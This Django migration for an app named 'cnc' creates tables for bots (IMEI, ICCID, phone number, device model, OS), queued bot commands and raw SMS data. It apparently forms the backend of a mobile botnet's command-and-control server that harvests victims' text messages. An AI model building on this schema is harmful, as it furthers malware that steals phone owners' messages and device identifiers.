# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-29 06:41
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Bot',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('hash', models.CharField(max_length=50)),
                ('imei', models.CharField(max_length=30)),
                ('iccid', models.CharField(max_length=30)),
                ('control_field', models.CharField(max_length=30)),
                ('number', models.CharField(max_length=30)),
                ('model', models.CharField(max_length=30)),
                ('os', models.CharField(max_length=30)),
                ('last_online', models.DateTimeField(auto_now=True)),
            ],
        ),
        migrations.CreateModel(
            name='BotCommand',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('command', models.CharField(max_length=20)),
                ('parameters', models.CharField(max_length=4096)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cnc.Bot')),
            ],
        ),
        migrations.CreateModel(
            name='SmsData',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('raw_data', models.CharField(max_length=1024)),
                ('bot', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='cnc.Bot')),
            ],
        ),
    ]
